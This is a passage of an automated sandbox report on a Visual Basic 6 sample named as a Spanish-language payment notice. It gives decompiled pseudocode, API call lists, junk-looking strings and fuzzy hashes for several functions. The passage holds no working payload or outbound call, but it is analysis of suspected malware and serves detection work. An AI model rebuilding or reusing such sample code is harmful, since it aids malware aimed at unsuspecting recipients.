					_t222 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t222;
					if(_v164 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x403c80);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v216 = _t222;
					}
					_v48 = _v144;
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v220 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v220 = 0x422010;
				}
				_t204 =  &_v72;
				L00401566();
				_v152 = _t204;
				_t208 =  *((intOrPtr*)( *_v152 + 0x100))(_v152,  &_v76, _t204,  *((intOrPtr*)( *((intOrPtr*)( *_v220)) + 0x308))( *_v220));
				asm("fclex");
				_v156 = _t208;
				if(_v156 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x403cfc);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v224 = _t208;
				}
				_push(0);
				_push(0);
				_push(_v76);
				_t209 =  &_v92;
				_push(_t209);
				L00401500();
				_push(_t209);
				L00401506();
				_v40 = _t209;
				_push( &_v76);
				_t211 =  &_v72;
				_push(_t211);
				_push(2);
				L00401512();
				L0040157E();
				_push(0x4206b0);
				L00401554();
				L00401554();
				L0040157E();
				return _t211;
			}

0x004200dd
0x004200ec
0x004200f8
0x00420100
0x00420103
0x0042010a
0x00420111
0x00420120
0x00420129
0x00420135
0x00420152
0x00420137
0x00420137
0x0042013c
0x00420141
0x00420146
0x00420146
0x00420176
0x0042017a
0x0042017f
0x00420197
0x0042019d
0x0042019f
0x004201ac
0x004201d1
0x004201ae
0x004201ae
0x004201b3
0x004201b8
0x004201be
0x004201c4
0x004201c9
0x004201c9
0x004201db
0x004201e1
0x004201eb
0x004201ee
0x004201f8
0x004201fc
0x004201fd
0x00420202
0x00420209
0x00420216
0x00420217
0x0042021d
0x0042021e
0x00420223
0x0042022d
0x00420235
0x00420239
0x0042023a
0x0042023c
0x00420241
0x0042024d
0x0042024f
0x00420251
0x00420259
0x0042025a
0x0042025d
0x00420262
0x00420267
0x00420267
0x0042026a
0x00420271
0x00420278
0x0042027b
0x0042027c
0x00420286
0x0042028b
0x0042028c
0x00420291
0x00420298
0x0042029d
0x004202a7
0x004202af
0x004202b4
0x004202bd
0x004202ca
0x004202e7
0x004202cc
0x004202cc
0x004202d1
0x004202d6
0x004202db
0x004202db
0x004202f9
0x00420311
0x00420314
0x00420316
0x00420323
0x00420345
0x00420325
0x00420325
0x00420327
0x0042032c
0x00420332
0x00420338
0x0042033d
0x0042033d
0x0042034f
0x0042036a
0x00420370
0x00420372
0x0042037f
0x004203a4
0x00420381
0x00420381
0x00420386
0x0042038b
0x00420391
0x00420397
0x0042039c
0x0042039c
0x004203ab
0x004203b2
0x004203b9
0x004203be
0x004203c3
0x004203c8
0x004203cd
0x004203d2
0x004203d2
0x004203d7
0x004203dd
0x004203e1
0x004203e6
0x00420401
0x00420404
0x00420406
0x00420413
0x00420435
0x00420415
0x00420415
0x00420417
0x0042041c
0x00420422
0x00420428
0x0042042d
0x0042042d
0x0042044d
0x00420457
0x00420465
0x0042046b
0x00420470
0x00420475
0x0042047f
0x0042048b
0x004204a8
0x0042048d
0x0042048d
0x00420492
0x00420497
0x0042049c
0x0042049c
0x004204ba
0x004204d2
0x004204d5
0x004204d7
0x004204e4
0x00420506
0x004204e6
0x004204e6
0x004204e8
0x004204ed
0x004204f3
0x004204f9
0x004204fe
0x004204fe
0x00420510
0x0042052b
0x00420531
0x00420533
0x00420540
0x00420565
0x00420542
0x00420542
0x00420547
0x0042054c
0x00420552
0x00420558
0x0042055d
0x0042055d
0x00420573
0x0042057a
0x0042057a
0x00420586
0x004205a3
0x00420588
0x00420588
0x0042058d
0x00420592
0x00420597
0x00420597
0x004205c7
0x004205cb
0x004205d0
0x004205e8
0x004205ee
0x004205f0
0x004205fd
0x00420622
0x004205ff
0x004205ff
0x00420604
0x00420609
0x0042060f
0x00420615
0x0042061a
0x0042061a
0x00420629
0x0042062b
0x0042062d
0x00420630
0x00420633
0x00420634
0x0042063c
0x0042063d
0x00420642
0x00420648
0x00420649
0x0042064c
0x0042064d
0x0042064f
0x0042065a
0x0042065f
0x0042069a
0x004206a2
0x004206aa
0x004206af

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 004200F8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420129
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 00420141
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042017A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000160), ref: 004201C4
#575.MSVBVM60(?,00000009), ref: 004201FD
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000009), ref: 0042021E
__vbaFreeObj.MSVBVM60(00008008,?,?,00000009), ref: 0042022D
__vbaFreeVarList.MSVBVM60(00000002,00000009,?,00008008,?,?,00000009), ref: 0042023C
__vbaOnError.MSVBVM60(00000000,?,?,00401356), ref: 00420251
__vbaPrintObj.MSVBVM60(00403D50,00000000,?,00000000,?,?,00401356), ref: 00420262
#651.MSVBVM60(00000002), ref: 0042027C
__vbaStrMove.MSVBVM60(00000002), ref: 00420286
__vbaStrCmp.MSVBVM60(Rerefief,00000000,00000002), ref: 00420291
__vbaFreeStr.MSVBVM60(Rerefief,00000000,00000002), ref: 004202A7
__vbaFreeVar.MSVBVM60(Rerefief,00000000,00000002), ref: 004202AF
__vbaNew2.MSVBVM60(00403C70,004223FC,Rerefief,00000000,00000002), ref: 004202D6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 00420338
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,000000C8), ref: 00420397
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,000000C8), ref: 004203B9
#690.MSVBVM60(bedrageriets,Azulmic,Regular6,HOLLO), ref: 004203D2
#685.MSVBVM60(Rerefief,00000000,00000002), ref: 004203D7
__vbaObjSet.MSVBVM60(?,00000000,Rerefief,00000000,00000002), ref: 004203E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403FE8,0000001C), ref: 00420428
__vbaFreeObj.MSVBVM60(00000000,?,00403FE8,0000001C), ref: 00420457
__vbaStrCat.MSVBVM60(Verdantly,bopl), ref: 00420475
__vbaStrMove.MSVBVM60(Verdantly,bopl), ref: 0042047F
__vbaNew2.MSVBVM60(00403C70,004223FC,Verdantly,bopl), ref: 00420497
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 004204F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,00000140), ref: 00420558
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,00000140), ref: 0042057A
__vbaNew2.MSVBVM60(00403270,00422010), ref: 00420592
__vbaObjSet.MSVBVM60(?,00000000), ref: 004205CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000100), ref: 00420615
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00420634
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401356), ref: 0042063D
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042064F
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042065A
__vbaFreeStr.MSVBVM60(004206B0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042069A
__vbaFreeStr.MSVBVM60(004206B0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 004206A2
__vbaFreeVar.MSVBVM60(004206B0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 004206AA

Strings

HOLLO, xrefs: 004203BE
bopl, xrefs: 0042046B
Azulmic, xrefs: 004203C8
Rerefief, xrefs: 0042028C
bedrageriets, xrefs: 004203CD
DADAP, xrefs: 00420202
08, xrefs: 0042026A
Regular6, xrefs: 004203C3
Verdantly, xrefs: 00420470

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$ListMove$#575#651#685#690CallChkstkCopyErrorLatePrint
String ID: 08$Azulmic$DADAP$HOLLO$Regular6$Rerefief$Verdantly$bedrageriets$bopl
API String ID: 2545346589-1508429672
Opcode ID: 5a6afef418385cca0a8b88d4848bc8cda66400f4129ba27798bee27765b0cddb
Instruction ID: a9d791b71543017daf4980724bff78f5ba166075226547e1b10c5149a9161651
Opcode Fuzzy Hash: 5a6afef418385cca0a8b88d4848bc8cda66400f4129ba27798bee27765b0cddb
Instruction Fuzzy Hash: 5EF1FA71E00228AFDB10EFA1DD46F9DB7B4BF04704F5040AAE509B72A2DB785A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004206D7, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E004206D7(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				short _v124;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				char* _t95;
				signed int _t99;
				char* _t103;
				signed int _t107;
				char* _t113;
				intOrPtr _t155;
				intOrPtr _t167;

				_t167 = __fp0;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t155;
				_push(0x7c);
				L00401350();
				_v12 = _t155;
				_v8 = 0x4012c8;
				_v96 = 0x404024;
				_v104 = 8;
				L004014BE();
				_push( &_v72);
				_push(0x58);
				_push( &_v88);
				L0040143A();
				_push( &_v88);
				L004014DC();
				L00401560();
				_push( &_v88);
				_push( &_v72);
				_push(2);
				L0040153C();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v132 = 0x422010;
				}
				_t95 =  &_v52;
				L00401566();
				_v108 = _t95;
				_t99 =  *((intOrPtr*)( *_v108 + 0x158))(_v108,  &_v40, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v112 = _t99;
				if(_v112 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403c90);
					_push(_v108);
					_push(_v112);
					L00401572();
					_v136 = _t99;
				}
				if( *0x422010 != 0) {
					_v140 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v140 = 0x422010;
				}
				_t103 =  &_v56;
				L00401566();
				_v116 = _t103;
				_t107 =  *((intOrPtr*)( *_v116 + 0xe8))(_v116,  &_v44, _t103,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x2fc))( *_v140));
				asm("fclex");
				_v120 = _t107;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x403c90);
					_push(_v116);
					_push(_v120);
					L00401572();
					_v144 = _t107;
				}
				_push(_v40);
				L00401530();
				L00401560();
				_push(_t107);
				_push(_v44);
				L0040144C();
				_v124 =  ~(0 | _t107 <= 0x00000000);
				_push( &_v44);
				_push( &_v48);
				_push( &_v40);
				_push(3);
				L0040151E();
				_push( &_v56);
				_push( &_v52);
				_push(2);
				L00401512();
				_t113 = _v124;
				if(_t113 != 0) {
					_v96 = L"anoperineal";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L00401434();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L0040153C();
					_v96 = L"Subreptitiously";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L0040142E();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_t113 =  &_v72;
					_push(_t113);
					_push(2);
					L0040153C();
				}
				L00401428();
				_v32 = _t167;
				asm("wait");
				_push(0x4209c5);
				L00401554();
				L00401554();
				L00401554();
				return _t113;
			}

0x004206d7
0x004206dc
0x004206e7
0x004206e8
0x004206ef
0x004206f2
0x004206fa
0x004206fd
0x00420704
0x0042070b
0x00420718
0x00420720
0x00420721
0x00420726
0x00420727
0x0042072f
0x00420730
0x0042073a
0x00420742
0x00420746
0x00420747
0x00420749
0x00420758
0x00420772
0x0042075a
0x0042075a
0x0042075f
0x00420764
0x00420769
0x00420769
0x0042078d
0x00420791
0x00420796
0x004207a5
0x004207ab
0x004207ad
0x004207b4
0x004207d3
0x004207b6
0x004207b6
0x004207bb
0x004207c0
0x004207c3
0x004207c6
0x004207cb
0x004207cb
0x004207e1
0x004207fe
0x004207e3
0x004207e3
0x004207e8
0x004207ed
0x004207f2
0x004207f2
0x00420822
0x00420826
0x0042082b
0x0042083a
0x00420840
0x00420842
0x00420849
0x00420868
0x0042084b
0x0042084b
0x00420850
0x00420855
0x00420858
0x0042085b
0x00420860
0x00420860
0x0042086f
0x00420872
0x0042087c
0x00420881
0x00420882
0x00420885
0x00420893
0x0042089a
0x0042089e
0x004208a2
0x004208a3
0x004208a5
0x004208b0
0x004208b4
0x004208b5
0x004208b7
0x004208bf
0x004208c5
0x004208cb
0x004208d2
0x004208df
0x004208e7
0x004208eb
0x004208ec
0x004208f4
0x004208f5
0x004208ff
0x00420907
0x0042090b
0x0042090c
0x0042090e
0x00420916
0x0042091d
0x0042092a
0x00420932
0x00420936
0x00420937
0x0042093f
0x00420940
0x0042094a
0x00420952
0x00420953
0x00420956
0x00420957
0x00420959
0x0042095e
0x00420961
0x00420966
0x00420969
0x0042096a
0x004209af
0x004209b7
0x004209bf
0x004209c4

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 004206F2
__vbaVarDup.MSVBVM60 ref: 00420718
#607.MSVBVM60(?,00000058,?), ref: 00420727
__vbaStrVarMove.MSVBVM60(?,?,00000058,?), ref: 00420730
__vbaStrMove.MSVBVM60(?,?,00000058,?), ref: 0042073A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000058,?), ref: 00420749
__vbaNew2.MSVBVM60(00403270,00422010), ref: 00420764
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420791
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000158), ref: 004207C6
__vbaNew2.MSVBVM60(00403270,00422010), ref: 004207ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420826
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000E8), ref: 0042085B
#517.MSVBVM60(?), ref: 00420872
__vbaStrMove.MSVBVM60(?), ref: 0042087C
__vbaStrCmp.MSVBVM60(?,00000000,?), ref: 00420885
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?), ref: 004208A5
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004208B7
__vbaVarDup.MSVBVM60 ref: 004208DF
#522.MSVBVM60(?,?), ref: 004208EC
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 004208F5
__vbaStrMove.MSVBVM60(?,?,?), ref: 004208FF
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0042090E
__vbaVarDup.MSVBVM60 ref: 0042092A
#520.MSVBVM60(?,?), ref: 00420937
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420940
__vbaStrMove.MSVBVM60(?,?,?), ref: 0042094A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420959
#535.MSVBVM60 ref: 00420961
__vbaFreeStr.MSVBVM60(004209C5), ref: 004209AF
__vbaFreeStr.MSVBVM60(004209C5), ref: 004209B7
__vbaFreeStr.MSVBVM60(004209C5), ref: 004209BF

Strings

anoperineal, xrefs: 004208CB
Subreptitiously, xrefs: 00420916

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#520#522#535#607Chkstk
String ID: Subreptitiously$anoperineal
API String ID: 3004089779-3635317160
Opcode ID: c304d8c7facda8fd189d24166cdee8eb9adc537278bca621fb67d1a743a88abc
Instruction ID: dfa9f3583b1257bfc34336e087ff6c45314c7c9921b4229ca0033c44015d23d3
Opcode Fuzzy Hash: c304d8c7facda8fd189d24166cdee8eb9adc537278bca621fb67d1a743a88abc
Instruction Fuzzy Hash: 2E81DC71D00218ABDB00EFE1DD46EDDB7B8AB44304F60446AE106BB1A1DB786A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD2, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0041EDD2(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				short _v48;
				char _v56;
				char _v72;
				char* _v96;
				intOrPtr _v104;
				char* _v112;
				char _v120;
				void* _v124;
				intOrPtr* _v128;
				signed int _v132;
				short _v136;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				char* _t78;
				signed int _t82;
				short _t87;
				char* _t90;
				char* _t94;
				signed int _t98;
				char* _t99;
				intOrPtr _t131;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				L00401350();
				_v12 = _t131;
				_v8 = 0x401248;
				if( *0x422010 != 0) {
					_v144 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v144 = 0x422010;
				}
				_t78 =  &_v36;
				L00401566();
				_v128 = _t78;
				_t82 =  *((intOrPtr*)( *_v128 + 0x168))(_v128,  &_v124, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x300))( *_v144));
				asm("fclex");
				_v132 = _t82;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c90);
					_push(_v128);
					_push(_v132);
					L00401572();
					_v148 = _t82;
				}
				_v48 = _v124;
				_v56 = 2;
				_push( &_v56);
				_push( &_v72);
				L004014CA();
				_v112 = L"Apollo";
				_v120 = 0x8008;
				_push( &_v72);
				_t87 =  &_v120;
				_push(_t87);
				L0040158A();
				_v136 = _t87;
				L0040156C();
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L0040153C();
				_t90 = _v136;
				if(_t90 != 0) {
					if( *0x422010 != 0) {
						_v152 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v152 = 0x422010;
					}
					_t94 =  &_v36;
					L00401566();
					_v128 = _t94;
					_t98 =  *((intOrPtr*)( *_v128 + 0x1b8))(_v128,  &_v40, _t94,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x300))( *_v152));
					asm("fclex");
					_v132 = _t98;
					if(_v132 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x1b8);
						_push(0x403c90);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v156 = _t98;
					}
					_push(0);
					_push(0);
					_push(_v40);
					_t99 =  &_v56;
					_push(_t99);
					L00401500();
					_push(_t99);
					L004014DC();
					L00401560();
					_push(_t99);
					L00401530();
					L00401560();
					L00401554();
					_push( &_v40);
					_push( &_v36);
					_push(2);
					L00401512();
					L0040157E();
					_v96 = L"fraena";
					_v104 = 8;
					L004014BE();
					_push( &_v56);
					_push( &_v72);
					L004014C4();
					_push( &_v72);
					L004014DC();
					L00401560();
					_push( &_v72);
					_t90 =  &_v56;
					_push(_t90);
					_push(2);
					L0040153C();
				}
				_push(0x41f07b);
				L00401554();
				L00401554();
				return _t90;
			}

0x0041edd7
0x0041ede2
0x0041ede3
0x0041edef
0x0041edf7
0x0041edfa
0x0041ee08
0x0041ee25
0x0041ee0a
0x0041ee0a
0x0041ee0f
0x0041ee14
0x0041ee19
0x0041ee19
0x0041ee49
0x0041ee4d
0x0041ee52
0x0041ee61
0x0041ee67
0x0041ee69
0x0041ee70
0x0041ee8f
0x0041ee72
0x0041ee72
0x0041ee77
0x0041ee7c
0x0041ee7f
0x0041ee82
0x0041ee87
0x0041ee87
0x0041ee9a
0x0041ee9e
0x0041eea8
0x0041eeac
0x0041eead
0x0041eeb2
0x0041eeb9
0x0041eec3
0x0041eec4
0x0041eec7
0x0041eec8
0x0041eecd
0x0041eed7
0x0041eedf
0x0041eee3
0x0041eee4
0x0041eee6
0x0041eeee
0x0041eef7
0x0041ef04
0x0041ef21
0x0041ef06
0x0041ef06
0x0041ef0b
0x0041ef10
0x0041ef15
0x0041ef15
0x0041ef45
0x0041ef49
0x0041ef4e
0x0041ef5d
0x0041ef63
0x0041ef65
0x0041ef6c
0x0041ef8b
0x0041ef6e
0x0041ef6e
0x0041ef73
0x0041ef78
0x0041ef7b
0x0041ef7e
0x0041ef83
0x0041ef83
0x0041ef92
0x0041ef94
0x0041ef96
0x0041ef99
0x0041ef9c
0x0041ef9d
0x0041efa5
0x0041efa6
0x0041efb0
0x0041efb5
0x0041efb6
0x0041efc0
0x0041efc8
0x0041efd0
0x0041efd4
0x0041efd5
0x0041efd7
0x0041efe2
0x0041efe7
0x0041efee
0x0041effb
0x0041f003
0x0041f007
0x0041f008
0x0041f010
0x0041f011
0x0041f01b
0x0041f023
0x0041f024
0x0041f027
0x0041f028
0x0041f02a
0x0041f02f
0x0041f032
0x0041f06d
0x0041f075
0x0041f07a

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041EDEF
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 0041EE14
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EE4D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000168), ref: 0041EE82
#652.MSVBVM60(?,00000002), ref: 0041EEAD
__vbaVarTstEq.MSVBVM60(00008008,?,?,00000002), ref: 0041EEC8
__vbaFreeObj.MSVBVM60(00008008,?,?,00000002), ref: 0041EED7
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,00000002), ref: 0041EEE6
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EF10
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EF49
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001B8), ref: 0041EF7E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EF9D
__vbaStrVarMove.MSVBVM60(00000000), ref: 0041EFA6
__vbaStrMove.MSVBVM60(00000000), ref: 0041EFB0
#517.MSVBVM60(00000000,00000000), ref: 0041EFB6
__vbaStrMove.MSVBVM60(00000000,00000000), ref: 0041EFC0
__vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0041EFC8
__vbaFreeObjList.MSVBVM60(00000002,00000000,00000000,00000000,00000000), ref: 0041EFD7
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0041EFE2
__vbaVarDup.MSVBVM60 ref: 0041EFFB
#528.MSVBVM60(?,?), ref: 0041F008
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F011
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F01B
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F02A
__vbaFreeStr.MSVBVM60(0041F07B), ref: 0041F06D
__vbaFreeStr.MSVBVM60(0041F07B), ref: 0041F075

Strings

Apollo, xrefs: 0041EEB2
fraena, xrefs: 0041EFE7

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#528#652CallChkstkLate
String ID: Apollo$fraena
API String ID: 1415655392-2588804562
Opcode ID: a5de39c078cfe4b14ebbe447cfd721d092994f4af0688912df4f290744ec3486
Instruction ID: a3ab7134fc5c1a955be39eb0804005fe122aa47c9654af7565bfcef859900c95
Opcode Fuzzy Hash: a5de39c078cfe4b14ebbe447cfd721d092994f4af0688912df4f290744ec3486
Instruction Fuzzy Hash: 7A710C75D00218ABDB10EFA1DD46FDDB7B8BB48304F20416AF506B71A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDEA, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0041FDEA(void* __ebx, void* __edi, void* __esi, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				void* _v140;
				signed int _v144;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				char* _t90;
				signed int _t94;
				short _t98;
				signed int _t101;
				signed int _t112;
				signed int _t117;
				void* _t138;
				intOrPtr _t139;

				_t139 = _t138 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t139;
				L00401350();
				_v16 = _t139;
				_v12 = 0x4012a8;
				 *_a24 =  *_a24 & 0x00000000;
				if( *0x422010 != 0) {
					_v160 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v160 = 0x422010;
				}
				_t90 =  &_v44;
				L00401566();
				_v132 = _t90;
				_t94 =  *((intOrPtr*)( *_v132 + 0x70))(_v132,  &_v128, _t90,  *((intOrPtr*)( *((intOrPtr*)( *_v160)) + 0x30c))( *_v160));
				asm("fclex");
				_v136 = _t94;
				if(_v136 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x403cfc);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v164 = _t94;
				}
				_v52 = _v128;
				_v60 = 4;
				_push(0);
				_push( &_v60);
				_push( &_v76);
				L00401464();
				_v116 = 0x301dae;
				_v124 = 0x8003;
				_push( &_v76);
				_t98 =  &_v124;
				_push(_t98);
				L0040146A();
				_v140 = _t98;
				L0040156C();
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L0040153C();
				_t101 = _v140;
				if(_t101 != 0) {
					_v100 = L"Frigrelsesmidlerne5";
					_v108 = 8;
					L004014BE();
					_push( &_v60);
					_push( &_v76);
					L0040145E();
					_push( &_v76);
					L004014DC();
					L00401560();
					_push( &_v76);
					_push( &_v60);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v168 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v168 = 0x4223fc;
					}
					_v132 =  *_v168;
					_t112 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t112;
					if(_v136 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v172 = _t112;
					}
					_v140 = _v44;
					_t117 =  *((intOrPtr*)( *_v140 + 0x60))(_v140,  &_v40);
					asm("fclex");
					_v144 = _t117;
					if(_v144 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403c80);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v176 = _t117;
					}
					_t101 = _v40;
					_v156 = _t101;
					_v40 = _v40 & 0x00000000;
					L00401560();
					L0040156C();
				}
				L004014E2();
				asm("wait");
				_push(0x4200bf);
				L00401554();
				L00401554();
				return _t101;
			}

0x0041fded
0x0041fdf0
0x0041fdfb
0x0041fdfc
0x0041fe08
0x0041fe10
0x0041fe13
0x0041fe1d
0x0041fe27
0x0041fe44
0x0041fe29
0x0041fe29
0x0041fe2e
0x0041fe33
0x0041fe38
0x0041fe38
0x0041fe68
0x0041fe6c
0x0041fe71
0x0041fe80
0x0041fe83
0x0041fe85
0x0041fe92
0x0041feb1
0x0041fe94
0x0041fe94
0x0041fe96
0x0041fe9b
0x0041fe9e
0x0041fea4
0x0041fea9
0x0041fea9
0x0041febb
0x0041febe
0x0041fec5
0x0041feca
0x0041fece
0x0041fecf
0x0041fed4
0x0041fedb
0x0041fee5
0x0041fee6
0x0041fee9
0x0041feea
